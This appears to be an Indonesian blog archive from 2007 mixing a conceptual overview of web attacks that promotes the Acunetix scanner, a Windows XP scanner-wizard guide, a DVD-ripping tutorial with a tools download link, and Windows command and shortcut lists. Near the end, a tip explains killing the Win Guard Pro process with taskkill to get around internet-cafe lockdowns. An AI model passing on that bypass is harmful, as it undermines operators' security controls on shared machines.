Parameter manipulation : Melakukan manipulasi terhadap data yang di transfer antara browser dengan aplikasi website tersebut. hal ini bisa di lakukan dengan beberapa cara :
- Cookie manipulation : Cookie yang menyimpan data login dalam suatu sesi, dengan adanya cookie, seorang user tidak perlu lagi melakukan login ke website tersebut, selama dia belum melakukan logout. karena cookie ini di simpan di dalam komputer klient, penyerang dengan mudah memanipulasi data cookie tersebut.
- HTTP Header Manipulation : HTTP headers yang mengontrol informasi dari jaringan klien ke server situs, di karenakan HTTP header ini berasal dari komputer client ( pelanggan ) . Penyerang dengan mudah mengubah dan memanipulasi data tersebut.
- HTLM Form Field manipulation : Sebuah form login, form pendaftaran, Form transfer, yang biasanya ada di suatu situs bisa di modifikasi dengan mudah, dan melancarkan serangan dengan memakai form yang sudah di ubah tersebut.
- URL manipulation : Sebuah situs yang menampilkan parameter perintah di bagian link situs tersebut di browser, akan dengan mudah di baca oleh penyerang tersebut untuk melakukan perubahan.
- Directory enumeration : Menganalisa directori dan struktur dari website tersebut, dan mencari directory tersembunyi, maupun mencari direktori yang memiliki write akses.
Dan masih banyak lagi metode serangan lainnya seperti :
File Inclusion, Script Source Code Disclosure, CRLF Injection Cross Frame Scripting (XFS), PHP Code Injection, XPath Injection, LDAP Injection, Blind SQL/XPath Injection, Authentication attacks, Buffer overflows.
Beberapa kejadian akibat bisa di tembus nya aplikasi website suatu perusahaan.
- Pada tahun 2000, seorang remaja berumur 17 tahun yang berasal dari norwegia, menembus sebuah bank lokal terkenal di negaranya. Pada saat dia sedang melakukan transaksi online di bank tersebut, dia menyadari bahwa aplikasi website ini menggunakan nomor accountnya sebagai bagian parameter di link url. Kemudian dia mencoba memasukkan secara acak nomor account lainnya di link url tersebut, dan hasilnya data account bank yang dia tulis tersebut muncul di layar komputernya lengkap dengan informasi detail lainnya.
- Pada tanggal 31 oktober 2001, Website Acme Art Inc, berhasil di tembus dan informasi kartu kredit customer yang pernah melakukan order lewat website ini di ambil, dan di tampilkan di Usenet Groups. Informasi hacking ini pun di beritakan kembali oleh media secara gencar, yang membuat perusahaan tersebut mengalami kerugian ratusan ribuan dollar di karenakan kehilangan kepercayaan customernya, dan banyak yang membatalkan order pembeliannya.
Perusahaan ini juga kehilangan pinjaman keduanya, yang di batalkan secara sepihak oleh Venture Capital Firm.
- Pada bulan juni 2003, Perusahaan Fashion dengan merk Guess, dan pet supply retailer PetCo. Keamanan website mereka di tembus dan sebagai hasilnya, hampir setengah juta data informasi kartu kredit customernya di curi.
- Di Indonesia sendiri, tentu kita masih ingat dengan situs KPU ( komisi pemilihan umum ), yang di serang dengan metode SQL injection. Yang mengakibatkan nama-nama partai yang ada di situs tersebut berubah.
- Choice Point inc, akibat tindakan hacking yang dilakukan seseorang, mengalami kerugian kurang lebih 15 Juta dollar
- University of Southern California ($140k +)
- Microsoft (Website defacement)
- PayPal (Account information stolen; cost unknown)
- Victoria’s Secret ($50k fine)
- Hotmail (Vulnerability detected – not fixed)
- Amazon (Vulnerability detected – not fixed)
- Petco (credit cards of 500k customers stolen)
Acunetix Website Aplikasi Scanner, Solusi untuk meminimalisir kejadian hacking atas situs perusahaan Anda
Apa itu Acunetix website aplikasi scanner ?
Acunetix Website aplikasi scanner adalah sebuah software yang berfungsi untuk melakukan scanning atas kelemahan yang bisa terjadi di situs Anda. Dengan memakai software ini, anda akan mengetahui apa saja kelemahan yang terdapat di situs anda beserta dengan saran apa yang harus Anda lakukan atas kelemahan yang di temukan tersebut.
Fasilitas apa yang terdapat di Acunetix website aplikasi scanner ?
Software ini secara otomatis akan memeriksa situs Anda terhadap kelemahan, metode nya antara lain :
-
Version Check : Vulnerable Web Servers, Vulnerable Web Server Technologies – such as “PHP 4.3.0 file disclosure and possible code execution, CGI Tester, Checks for Web Servers Problems – Determines if dangerous HTTP methods are enabled on the web server (e.g. PUT, TRACE, DELETE), Verify Web Server Technologies.
-
Parameter Manipulation : Cross-Site Scripting (XSS) – over 25 different XSS variations are tested, SQL Injection, Code Execution, Directory Traversal, File Inclusion, Script Source Code Disclosure, CRLF Injection, Cross Frame Scripting (XFS), PHP Code Injection, XPath Injection, Full Path Disclosure, LDAP Injection, and Cookie Manipulation.
-
MultiRequest Parameter Manipulation : Blind SQL/XPath Injection.
-
File Checks : Checks for Backup Files or Directories - Looks for common files (such as logs, application traces, CVS web repositories), Cross Site Scripting in URI, Checks for Script Errors.
-
Directory Checks : Looks for Common Files (such as logs, traces, CVS), Discover Sensitive Files/Directories, Discovers Directories with Weak Permissions, Cross Site Scripting in Path and PHPSESSID Session Fixation, Web Applications.
-
Text Search : Directory Listings, Source Code Disclosure, Check for Common Files, Check for Email Addresses, Microsoft Office Possible Sensitive Information, Local Path Disclosure, Error Messages.
-
GHDB Google Hacking Database : Over 1200 GHDB Search Entries in the Database.
-
Other vulnerability tests may also be preformed using the manual tools provided, including: Input Validation, Authentication attacks, Buffer overflows.
Sabtu, 08 September 2007
Scanner and Camera Wizard Windows XP
Scanning dan mengatur foto lebih sederhana pada Windows XP. Dari mengarsipkan sampai mencetak, Anda dapat menemukan semuanya di sini.
Windows XP sangat baik dalam menangani media. Melihat foto atau file MP3 dalam Explorer dan Anda dapat mengetahui banyak hal tanpa harus membukanya karena Anda dapat melihat metadata file.
Untuk gambar, hal ini meliputi data EXIF dari kamera seperti kapan Anda mengambil foto (bukan kapan Anda meng-copy file tersebut ke PC) dan apakah flash menyala atau tidak. Untuk mempermudah Anda dalam menangani foto, XP mempunyai Scanner and Cameras Wizard yang membantu Anda mentransfer foto, scan gambar, dan menangani file gambar pada PC Anda.
Anda tidak perlu menggunakan Scanners and Cameras Wizard untuk mengakses foto. Kebanyakan scanner dilengkapi dengan software scanning mereka sendiri dan kebanyakan kamera digital tampil sebagai removable drive di dalam Explorer sehingga Anda cukup mengklik huruf drive untuk membuka mereka.
Gambar Anda mungkin tidak berada di dalam root drive, tetapi di dalam subfolder. Anda dapat menyeret gambar tersebut ke folder pada harddisk untuk meng-copy mereka ke PC, tetapi Anda harus menghapusnya sendiri dan Anda juga harus mengganti nama masing-masing file. Anda dapat melihat preview-nya dengan berpindah ke view Thumbnail, tetapi ini cukup lambat kecuali jika Anda mempunyai koneksi USB2.
Hal-hal yang Dapat dilakukan Wizard
Meskipun begitu, tidak ada salahnya mencoba wizard tersebut karena ia lebih dari sekadar memberi interface sederhana untuk memasukkan gambar ke PC Anda.
Pertama, ia dapat bekerja dengan berbagai macam perangkat, termasuk web cam dan juga kamera digital dan scanner. Banyak webcam mempunyai memory internal yang dapat Anda gunakan untuk menyimpan foto. Hal ini membantu dalam melakukan fotografi singkat atau mengambil beberapa gambar dengan cepat.
Jalankan wizard dengan webcam dan Anda dapat melihat live preview untuk mengambil gambar. Selain itu, Anda dapat melihat gambar apapun yang diambil dengan webcam dan yang belum dihapus atau ditransfer.
Anda juga dapat menggunakan wizard dengan CD foto yang dibuat dari PC. Begitu Windows XP mengetahui bahwa Anda memasukkan CD yang berisi gambar, dialog AutoPlay akan menanyakan apakah Anda ingin menjalankan wizard untuk mentransfer mereka ke PC.
Setelah mentransfer foto, Anda dapat mengirim yang paling disukai langsung ke situs web Anda, atau mengirim mereka ke layanan online untuk mencetak mereka semua.
Men-scan dengan Mudah
Kebanyakan scanner dilengkapi dengan software scanning mereka sendiri, tetapi sepanjang ada driver TWAIN Anda dapat menggunakannya dengan software image editing manapun. Interface scanning di dalam Scanners and Cameras Wizard Windows XP sederhana dan ia mempunyai fitur utama yang Anda butuhkan untuk memasukkan gambar ke dalam PC.
Anda dapat memulainya dengan mengklik ganda scanner di dalam My Computer atau dari dalam suatu aplikasi jika ingin menggunakan gambarnya di situ. Jika Anda bekerja dari suatu aplikasi dan menemukan beberapa perangkat pada PC, pilihlah scanner dari Device with Removable Storage. Menu tersebut juga akan menampilkan kamera digital atau perangkat gambar yang lain yang terdapat pada sistem, karena Anda dapat memasukkan gambar dari kamera digital atau webcam dari situ.
Pada waktu men-scan gambar, tidak masalah apakah Anda memilih resolusi Web Quality atau Print Quality karena Anda dapat memilih apa sebenarnya yang diinginkan nanti dalam wizard.
Print Quality memberikan gambar yang lebih besar yang tampak baik pada waktu dicetak. Sebaliknya, Web Quality menurunkan resolusi gambar sehingga Anda mendapatkan file yang lebih kecil yang cukup untuk dilihat pada layar dan tidak memakan waktu yang lama untuk di-upload atau dikirim lewat e-mail, tetapi tidak terlihat baik pada waktu dicetak. Klik Custom Insert untuk mengatur option scanning.
Mengatur Scanner
Sama seperti yang lainnya pada wizard, dialognya sederhana tetapi ia mempunyai setting yang sangat Anda butuhkan. Anda dapat memilih untuk men-scan warna, abu-abu, atau hitam dan putih (gunakan hitam dan putih jika Anda ingin menggunakan dokumen tersebut untuk ocr—optical character recognition).
Anda juga dapat memilih Customs untuk mengatur brightness, constrast, dan resolusi scan dan juga apakah ia di-scan warna, abu-abu, hitam, dan putih. Anda hanya dapat menggunakan resolusi optik scanner karena wizard tidak dapat melakukan interpolasi, tidak seperti software yang didesain untuk mengatur scanner. Untuk gambar yang ingin Anda gunakan pada layar—halaman web atau file PowerPoint—maka 72 dpi sudahlah mencukupi. Untuk gambar yang ingin dicetak, maka resolusinya bisa 150 sampai 300 dpi, bergantung kepada sisa kapasitas harddisk yang dimiliki.
Pada waktu mengklik Preview jika hanya ada satu gambar pada scanner, maka wizard secara otomatis akan memilihnya, walaupun Anda dapat menyeret batas scanning jika ingin memilih bagian tertentu pada gambar. Anda dapat sekaligus memasukkan beberapa gambar pada scanner dan memilih area scanning untuk masing-masing mereka secara manual. Pada waktu Anda mengklik Scan wizard, akan menanyakan nama grup dan jenis file yang diinginkan: ada BMP, JPG, TIF, dan PNG. Jika Anda ingin men-scan beberapa gambar secara satu per satu, pada layar akhir jangan klik Finish tetapi kliklah Back.
Apa yang Harus Dilakukan Jika Saya Tidak Menemukan Scanner and Camera Wizard?
Biasanya wizard akan dibuka secara otomatis pada waktu Anda menghubungkan kamera atau memasukkan memory card ke reader. Jika tidak, Anda dapat mencoba membukanya dari task pane My Pictures atau klik kanan kamera pada My Computer dan pilih Get Pictures. Jika membuka Scanner and Camera control panel, Anda juga akan mendapatkan tool tersebut dari task pane pada waktu mengklik kamera. Atur Start menu agar menampilkan Control Panel sebagai menu bertingkat supaya Anda dapat langsung membuka kamera.
Mengapa Wizard Tidak Terbuka Secara Otomatis? Dan Apa yang Harus Saya Lakukan?
Yang biasanya menjadi penyebab mengapa wizard tidak terbuka secara otomatis adalah karena Anda mematikan AutoPlay untuk perangkat removable, Anda dapat menyalakannya kembali dari Registry.
Cari key HKEY_CURRENT_USER\ Software\Microsoft\Windows\ CurrentVersion\Policies\Explorer dan pastikan NoDriveTypeAutoRun adalah REG_DWORD dengan nilai 0x00000091 (145 desimal). Untuk lebih mudahnya, download TweakUI dari www.microsoft. com/windowsxp/pro/downloads/powertoys.asp. Pada TweakUI, klik My Computer, AutoPlay, Types, dan nyalakan ‘Enable Autoplay for removable devices’.
Saya Telah Melakukan Hal Tersebut di Atas, tetapi Tetap Saja Tidak Berhasil
Jika itu tidak berhasil, terutama jika wizard muncul pada waktu kali pertama Anda menghubungkan kamera tetapi ia tidak muncul lagi setelah itu, pastikan service Shell Hardware Detection dijalankan secara otomatis dan logoff dan on kembali.
Explorer hanya mencoba meregister ke service tersebut pada waktu Anda menjalankan PC. Jika pada saat yang bersamaan service tersebut tidak bekerja, ia tidak akan mencoba meregister lagi sehingga ia tidak pernah mendapat pemberitahuan bahwa Anda telah menghubungkan suatu perangkat baru, yang akan menjalankan AutoPlay.
Namun masalahnya bisa saja lebih serius dari sekadar AutoPlay, terutama jika Anda tidak dapat menjalankan Scannner and Camera Wizard. Periksa di Registry key HKEY_LOCAL_ MACHINE\ SOFTWARE\Classes\WIA.Autoplay DropHandler.1\ shell\open\DropTarget (jika tidak ada buat key tersebut). Clsid harus berupa REG_SZ dengan nilai string {F1ABE2B5-C073-4dba-B6EBFD7A5111DD8F}.
Tool untuk Memperbaiki AutoPlay
Memperbaiki AutoPlay bisa lebih mudah dengan AutoPlay Repair Wizard yang didesain untuk mengecek dan memperbaiki problem pada AutoPlay. Cari AutoPlay di www.microsoft/downloads: file-nya bernama AutoFixe.EXE. Anda dapat menekan tombol Repair untuk memperbaiki secara otomatis, kemudian klik Open Log untuk melihat apa yang telah diubah. AutoFixe hanya bekerja dengan kamera dan perangkat yang muncul di My Computer sebagai removable disk dengan huruf drive sendiri.
Saya Telah Mencabut dan Menghubungkan Kamera ke USB, tetapi AutoPlay Tetap Saja Tidak Bekerja
Jika Anda telah menghubungkan kamera digital ke USB dan AutoPlay tidak bekerja setelah Anda mencabut dan menghubungkannya kembali, maka bisa jadi USB tersebut tidak respon. Anda dapat menemukan solusi untuk masalah ini di Microsoft Download Centre: cari Q810400_WXP_SP2_x86_ENU.exe.
Bekerja dengan Foto
Nama internal yang dibuat kamera Anda untuk foto sangat berarti dan wizard mengganti nama file dengan menggunakan deskripsi yang diberikan sebagai nama grup. Meskipun Anda dapat mengurutkan folder tersebut berdasarkan tanggal, akan lebih baik jika menyertakan tanggal pada nama file karena jika Anda mengedit file tersebut di kemudian hari maka ia akan mendapat cap tanggal yang baru.
Masukkan tahun pada bagian depan nama file: Ini sedikit mengganggu, tetapi tidak akan membingungkan ketika wizard menambahkan 002 pada bagian akhir nama file untuk gambar yang kedua dan ini akan membuat folder Anda diurut berdasarkan tanggal walaupun sebenarnya ia diurutkan berdasarkan abjad.
Melewati Wizard
Daripada mengklik dialog wizard satu per satu, Anda dapat memerintah Windows XP untuk mentransfer file secara otomatis begitu Anda menghubungkan kamera (ini dapat dilakukan untuk setiap kamera Plug and Play yang mendukung PTP atau yang mempunyai driver Windows Image Acquisition—WIA). Cara ini cocok untuk kamera yang tidak muncul sebagai removable drive di dalam Explorer tetapi hanya muncul di dalam My Computer.
Klik kanan kamera di dalam My Computer dan pilih Properties, Events, dan Save all pictures to this folder. Jika folder yang Anda inginkan tidak terdapat dalam daftar, klik Browse untuk menemukannya. Pilih Delete pictures from camera setelah menyimpan mereka: Tidak semua kamera mendukung ini jadi Anda mungkin harus menghapusnya sendiri, tetapi jika kamera Anda dapat melakukannya ini akan membersihkan memory card Anda dengan cepat. Jangan lupa untuk mengganti nama gambar di dalam Explorer: Anda dapat memilih semuanya dan pilih File kemudian Rename untuk mengganti semua nama file sekaligus.
Mencetak Gambar dengan Baik dan Cepat
Photo Printing Wizard sama dengan Scanner and Camera Wizard: Ia memandu Anda dalam memilih gambar yang diinginkan dan me-layout mereka pada halaman sehingga Anda tidak perlu membuang kertas. Mungkin dapat sedikit membosankan jika banyak mengklik Next padahal Anda hanya ingin mencetak satu foto. Sebagai gantinya, Anda dapat menyeret file gambar ke icon printer di dalam Explorer. Cara ini hanya menggunakan setting default printer Anda, jadi gunakan wizard jika ingin mengecek resolusi atau memilih manual feed. Juga tidak ada salahnya jika Anda meluangkan waktu untuk mengecek apakah cartridge sudah lurus sebelum mencetak pada kertas foto.
Cara Wizard Menghubungkan Kamera Tanpa Driver
Pada waktu Anda menghubungkan perangkat baru ke PC, hardware recognition service memberitahu Explorer tentang perangkat baru tersebut. Jika ada AutoPlay untuk jenis file yang terdapat pada perangkat tersebut, ia akan membuka dialog AutoPlay dengan daftar tugas yang sesuai untuk jenis file tersebut. Pada waktu Anda memasukkan CD yang tidak mempunyai file AutoRun.INF ia melakukan hal yang sama, sehingga selain mengambil dari kamera Scanner and Camera Wizard juga dapat mengambil foto yang disimpan ke CD.
Wizard tersebut dapat bekerja dengan hampir semua kamera karena ia menggunakan PTP (Picture Transfer Protocol) untuk mengontrol kamera tanpa perlu menggunakan software yang disertakan bersama kamera. Ini merupakan protokol standar USB untuk mentransfer gambar diam dan jika kamera digital Anda mendukungnya, maka Anda tidak perlu menginstal driver—cukup hubungkan dan Windows dapat bekerja dengannya.
Kamera PTP tampil sebagai harddisk removable di dalam Explorer, tetapi wizard juga dapat bekerja dengan kamera dalam mode USB asalkan Anda mempunyai driver-nya. Jika Anda dapat menggunakan kamera digital sebagai webcam, maka wizard akan mengambil gambar streaming dari kamera dalam mode USB, bukan PTP.
How to: Ripping DVD movie to .avi (DivX)
This tutorial will teach you how to rip a standard DVD movie to .avi format (DivX or XviD). It also tells you how to add subtitles to the movie without an external subtitle source (e.g. a .srt file).
You must have the following programs:
-DVD Shrink
-SubRip
-Auto Gordian Knot
Step 1
1. Put the DVD in the drive
2. Open DVD Shrink
3. Click “Open Disc”
4. Select the Disc you wish to rip
5. Wait for it to open the file
6. Click “Re-author”
7. Under “Main Movie” click and drag the title you want (usually Title 1, use the preview to find out which title you want)
8. Click on the “Compression Settings” tab
9. Change the compression setting from “Automatic” to “No Compression”
10. Uncheck all Audio tracks you don’t want (usually you will only want AC3 5.1-ch English or whatever language the movie is really in)
11. (Optional) Select all Subpictures that you want (if there is more than one in the language you want, then select all in that language, we can choose the correct one later)(make sure you select all the English subtitle options if there are subtitles that should be in the movie, such as the alien subtitles in star wars or the elvish subtitles in lord of the rings)
12. Click “Backup”
13. Click “Yes” if it tells you the DVD size is too big
14. Make sure the Backup Target is set to “Hard Disk Folder” then select a folder for the DVD files to go in
15. Click “OK”
16. Wait till it’s done
Step 2 (Only if subtitles are to be added)
1. Open SubRip
2. Click “File”
3. Click “Open VOB(s)”
4. Click “Open Dir”
5. Locate the VOB files that you just created with DVD Shrink
6. Click the first VOB
7. Click “Open”
8. Select the Language Stream you want from the drop down menu
9. Click “Start”
10. It won’t know what any of the letters are at first, so you have to type them in when it asks you to (you’ll understand when you do it)
11. Wait till it’s finished ripping the subs
12. In the bottom window pane, click “Corrections”
13. Click “Post OCR Correction”
14. Select the first option, second option, choose the language of the subtitles, select the third option, leave the next 2 options, then select the 2 options after that
15. Click “Correct”
16. Click “File”
17. Click “Save As”
18. Click “Save”
19. Click “Save”
Step 3
1. Open Auto Gordian Knot
2. Click the folder next to “Input file”
3. Locate the IFO that was ripped in DVD Shrink and open it
4. Click the folder next to “Output file”
5. Name the file what you want
6. Click “Save” If you don’t want or need subtitles, skip to 10.
7. (If you have subtitles) Press Ctrl+F8
8. (If you have subtitles) Click the folder next to “External Subs”
9. (If you have subtitles) Click the subtitles file and open it
10. You do not need to select any subtitle track
11. Select the Audio track that you want (there should only be one)
12. Under “Predefined size” select “1 CD (700 Mb)”
13. Click “Advanced Settings”
14. Click “Fixed width” and select “640”
15. Under “Codec” select either of the options (I use XviD)
16. Click “OK”
17. Click “Add Job”
18. Click “Start”
19. Let it do what it wants, it should take about 2 to 3 hours to finish it all
20. Open the location where you saved the output file and that’s it, you should have a fully working .avi with burnt in subs (if you have subs in the movie)
Sekalian up programnya
nama file = Tool for Ripping DVD.zip (11.07 MB)
zip files contain
-DVD Shrink
-SubRip
-Auto Gordian Knot
http://indoupload.net/files/195/Tool%20f...%20DVD.zip
RUN Command
Run Commands:
compmgmt.msc - Computer management
devmgmt.msc - Device manager
diskmgmt.msc - Disk management
dfrg.msc - Disk defrag
eventvwr.msc - Event viewer
fsmgmt.msc - Shared folders
gpedit.msc - Group policies
lusrmgr.msc - Local users and groups
perfmon.msc - Performance monitor
rsop.msc - Resultant set of policies
secpol.msc - Local security settings
services.msc - Various Services
msconfig - System Configuration Utility
regedit - Registry Editor
msinfo32 _ System Information
sysedit _ System Edit
win.ini _ windows loading information(also system.ini)
winver _ Shows current version of windows
mailto: _ Opens default email client
command _ Opens command prompt
Run Commands to access the control panel:
Add/Remove Programs control appwiz.cpl
Date/Time Properties control timedate.cpl
Display Properties control desk.cpl
FindFast control findfast.cpl
Fonts Folder control fonts
Internet Properties control inetcpl.cpl
Keyboard Properties control main.cpl keyboard
Mouse Properties control main.cpl
Multimedia Properties control mmsys.cpl
Network Properties control netcpl.cpl
Password Properties control password.cpl
Printers Folder control printers
Sound Properties control mmsys.cpl sounds
System Properties control sysdm.cpl
Command Prompt:
ANSI.SYS Defines functions that change display graphics, control cursor movement, and reassign keys.
APPEND Causes MS-DOS to look in other directories when editing a file or running a command.
ARP Displays, adds, and removes arp information from network devices.
ASSIGN Assign a drive letter to an alternate letter.
ASSOC View the file associations.
AT Schedule a time to execute commands or programs.
ATMADM Lists connections and addresses seen by Windows ATM call manager.
ATTRIB Display and change file attributes.
BATCH Recovery console command that executes a series of commands in a file.
BOOTCFG Recovery console command that allows a user to view, modify, and rebuild the boot.ini
BREAK Enable / disable CTRL + C feature.
CACLS View and modify file ACL\'s.
CALL Calls a batch file from another batch file.
CD Changes directories.
CHCP Supplement the International keyboard and character set information.
CHDIR Changes directories.
CHKDSK Check the hard disk drive running FAT for errors.
CHKNTFS Check the hard disk drive running NTFS for errors.
CHOICE Specify a listing of multiple options within a batch file.
CLS Clears the screen.
CMD Opens the command interpreter.
COLOR Easily change the foreground and background color of the MS-DOS window.
COMP Compares files.
COMPACT Compresses and uncompress files.
CONTROL Open control panel icons from the MS-DOS prompt.
CONVERT Convert FAT to NTFS.
COPY Copy one or more files to an alternate location.
CTTY Change the computers input/output devices.
DATE View or change the systems date.
DEBUG Debug utility to create assembly programs to modify hardware settings.
DEFRAG Re-arrange the hard disk drive to help with loading programs.
DEL Deletes one or more files.
DELETE Recovery console command that deletes a file.
DELTREE Deletes one or more files and/or directories.
DIR List the contents of one or more directory.
DISABLE Recovery console command that disables Windows system services or drivers.
DISKCOMP Compare a disk with another disk.
DISKCOPY Copy the contents of one disk and place them on another disk.
DOSKEY Command to view and execute commands that have been run in the past.
DOSSHELL A GUI to help with early MS-DOS users.
DRIVPARM Enables overwrite of original device drivers.
ECHO Displays messages and enables and disables echo.
EDIT View and edit files.
EDLIN View and edit files.
EMM386 Load extended Memory Manager.
ENABLE Recovery console command to enable a disable service or driver.
ENDLOCAL Stops the localization of the environment changes enabled by the setlocal command.
ERASE Erase files from computer.
EXIT Exit from the command interpreter.
EXPAND Expand a M*cros*ft Windows file back to it\'s original format.
EXTRACT Extract files from the M*cros*ft Windows cabinets.
FASTHELP Displays a listing of MS-DOS commands and information about them.
FC Compare files.
FDISK Utility used to create partitions on the hard disk drive.
FIND Search for text within a file.
FINDSTR Searches for a string of text within a file.
FIXBOOT Writes a new boot sector.
FIXMBR Writes a new boot record to a disk drive.
FOR Boolean used in batch files.
FORMAT Command to erase and prepare a disk drive.
FTP Command to connect and operate on a FTP server.
FTYPE Displays or modifies file types used in file extension associations.
GOTO Moves a batch file to a specific label or location.
GRAFTABL Show extended characters in graphics mode.
HELP Display a listing of commands and brief explanation.
IF Allows for batch files to perform conditional processing.
IFSHLP.SYS 32-bit file manager.
IPCONFIG Network command to view network adapter settings and assigned values.
KEYB Change layout of keyboard.
LABEL Change the label of a disk drive.
LH Load a device driver in to high memory.
LISTSVC Recovery console command that displays the services and drivers.
LOADFIX Load a program above the first 64k.
LOADHIGH Load a device driver in to high memory.
LOCK Lock the hard disk drive.
LOGON Recovery console command to list installations and enable administrator login.
MAP Displays the device name of a drive.
MD Command to create a new directory.
MEM Display memory on system.
MKDIR Command to create a new directory.
MODE Modify the port or display settings.
MORE Display one page at a time.
MOVE Move one or more files from one directory to another directory.
MSAV Early M*cros*ft Virus scanner.
MSD Diagnostics utility.
MSCDEX Utility used to load and provide access to the CD-ROM.
NBTSTAT Displays protocol statistics and current TCP/IP connections using NBT
NET Update, fix, or view the network or network settings
NETSH Configure dynamic and static network information from MS-DOS.
NETSTAT Display the TCP/IP network protocol statistics and information.
NLSFUNC Load country specific information.
NSLOOKUP Look up an IP address of a domain or host on a network.
PATH View and modify the computers path location.
PATHPING View and locate locations of network latency.
PAUSE Command used in batch files to stop the processing of a command.
PING Test / send information to another network computer or network device.
POPD Changes to the directory or network path stored by the pushd command.
POWER Conserve power with computer portables.
PRINT Prints data to a printer port.
PROMPT View and change the MS-DOS prompt.
PUSHD Stores a directory or network path in memory so it can be returned to at any time.
QBASIC Open the QBasic.
RD Removes an empty directory.
REN Renames a file or directory.
RENAME Renames a file or directory.
RMDIR Removes an empty directory.
ROUTE View and configure windows network route tables.
RUNAS Enables a user to execute a program on another computer.
SCANDISK Run the scandisk utility.
SCANREG Scan registry and recover registry from errors.
SET Change one variable or string to another.
SETLOCAL Enables local environments to be changed without affecting anything else.
SETVER Change MS-DOS version to trick older MS-DOS programs.
SHARE Installs support for file sharing and locking capabilities.
SHIFT Changes the position of replaceable parameters in a batch program.
SHUTDOWN Shutdown the computer from the MS-DOS prompt.
SMARTDRV Create a disk cache in conventional memory or extended memory.
SORT Sorts the input and displays the output to the screen.
START Start a separate window in Windows from the MS-DOS prompt.
SUBST Substitute a folder on your computer for another drive letter.
SWITCHES Remove add functions from MS-DOS.
SYS Transfer system files to disk drive.
TELNET Telnet to another computer / device from the prompt.
TIME View or modify the system time.
TITLE Change the title of their MS-DOS window.
TRACERT Visually view a network packets route across a network.
TREE View a visual tree of the hard disk drive.
TYPE Display the contents of a file.
UNDELETE Undelete a file that has been deleted.
UNFORMAT Unformat a hard disk drive.
UNLOCK Unlock a disk drive.
VER Display the version information.
VERIFY Enables or disables the feature to determine if files have been written properly.
VOL Displays the volume information about the designated drive.
XCOPY Copy multiple files, directories, and/or drives from one location to another.
TRUENAME When placed before a file, will display the whole directory in which it exists
TASKKILL It allows you to kill those unneeded or locked up applications
Windows XP Shortcuts:
ALT+- (ALT+hyphen) Displays the Multiple Document Interface (MDI) child window\'s System menu
ALT+ENTER View properties for the selected item
ALT+ESC Cycle through items in the order they were opened
ALT+F4 Close the active item, or quit the active program
ALT+SPACEBAR Display the System menu for the active window
ALT+TAB Switch between open items
ALT+Underlined letter Display the corresponding menu
BACKSPACE View the folder one level up in My Computer or Windows Explorer
CTRL+A Select all
CTRL+B Bold
CTRL+C Copy
CTRL+I Italics
CTRL+O Open an item
CTRL+U Underline
CTRL+V Paste
CTRL+X Cut
CTRL+Z Undo
CTRL+F4 Close the active document
CTRL while dragging Copy selected item
CTRL+SHIFT while dragging Create shortcut to selected iteM
CTRL+RIGHT ARROW Move the insertion point to the beginning of the next word
CTRL+LEFT ARROW Move the insertion point to the beginning of the previous word
CTRL+DOWN ARROW Move the insertion point to the beginning of the next paragraph
CTRL+UP ARROW Move the insertion point to the beginning of the previous paragraph
SHIFT+DELETE Delete selected item permanently without placing the item in the Recycle Bin
ESC Cancel the current task
F1 Displays Help
F2 Rename selected item
F3 Search for a file or folder
F4 Display the Address bar list in My Computer or Windows Explorer
F5 Refresh the active window
F6 Cycle through screen elements in a window or on the desktop
F10 Activate the menu bar in the active program
SHIFT+F10 Display the shortcut menu for the selected item
CTRL+ESC Display the Start menu
SHIFT+CTRL+ESC Launches Task Manager
SHIFT when you insert a CD Prevent the CD from automatically playing
WIN Display or hide the Start menu
WIN+BREAK Display the System Properties dialog box
WIN+D Minimizes all Windows and shows the Desktop
WIN+E Open Windows Explorer
WIN+F Search for a file or folder
WIN+F+CTRL Search for computers
WIN+L Locks the desktop
WIN+M Minimize or restore all windows
WIN+R Open the Run dialog box
WIN+TAB Switch between open items
Windows Explorer Shortcuts:
ALT+SPACEBAR - Display the current window’s system menu
SHIFT+F10 - Display the item\'s context menu
CTRL+ESC - Display the Start menu
ALT+TAB - Switch to the window you last used
ALT+F4 - Close the current window or quit
CTRL+A - Select all items
CTRL+X - Cut selected item(s)
CTRL+C - Copy selected item(s)
CTRL+V - Paste item(s)
CTRL+Z - Undo last action
CTRL+(+) - Automatically resize the columns in the right hand pane
TAB - Move forward through options
ALT+RIGHT ARROW - Move forward to a previous view
ALT+LEFT ARROW - Move backward to a previous view
SHIFT+DELETE - Delete an item immediately
BACKSPACE - View the folder one level up
ALT+ENTER - View an item’s properties
F10 - Activate the menu bar in programs
F6 - Switch between left and right panes
F5 - Refresh window contents
F3 - Display Find application
F2 - Rename selected item
Internet Explorer Shortcuts:
CTRL+A - Select all items on the current page
CTRL+D - Add the current page to your Favorites
CTRL+E - Open the Search bar
CTRL+F - Find on this page
CTRL+H - Open the History bar
CTRL+I - Open the Favorites bar
CTRL+N - Open a new window
CTRL+O - Go to a new location
CTRL+P - Print the current page or active frame
CTRL+S - Save the current page
CTRL+W - Close current browser window
CTRL+ENTER - Adds the http://www. (url) .com
SHIFT+CLICK - Open link in new window
BACKSPACE - Go to the previous page
ALT+HOME - Go to your Home page
HOME - Move to the beginning of a document
TAB - Move forward through items on a page
END - Move to the end of a document
ESC - Stop downloading a page
F11 - Toggle full-screen view
F5 - Refresh the current page
F4 - Display list of typed addresses
F6 - Change Address bar and page focus
ALT+RIGHT ARROW - Go to the next page
SHIFT+CTRL+TAB - Move back between frames
SHIFT+F10 - Display a shortcut menu for a link
SHIFT+TAB - Move back through the items on a page
CTRL+TAB - Move forward between frames
CTRL+C - Copy selected items to the clipboard
CTRL+V - Insert contents of the clipboard
ENTER - Activate a selected link
HOME - Move to the beginning of a document
END - Move to the end of a document
F1 - Display Internet Explorer Help
tambahan:
tasklist
contoh aplikasi command prompt tasklist dan taskkill
biasanya di warnet taskmanager di proteksi
udah di proteksi control panel, hardisk atau yang lainnya diproteksi pake wgp (win guard pro)
tips di command prompt ketikkan:
tasklist
abis lihat service atau program yang jalan cari wgp, kemudian ketikan:
taskkill wgp.exe
atau bisa menggunakan no PID
taskkill (no pid)
abis itu bebas deh install di warnet nggak usah password lagi
....
oh ya kalo dosnya diproteksi, bisa akses di Windows Eksplorer dengan mengetikkan:
C:\Windows\System32\command.com
Jumat, 07 September 2007
150 Trik’s dan Tip’s Windows
Setelah menginstalasi Windows dan aplikasi-aplikasi lain yang
dibutuhkan ke dalam komputer, ada beberapa hal yang seharusnya Anda lakukan. Di
antaranya adalah melakukan beberapa hal untuk mempercepat serta
mempermudah kinerja komputer. Misalnya, mengatur agar komputer bisa restart
lebih cepat, atau memunculkan menu tersembunyi, menggunakan shortcut
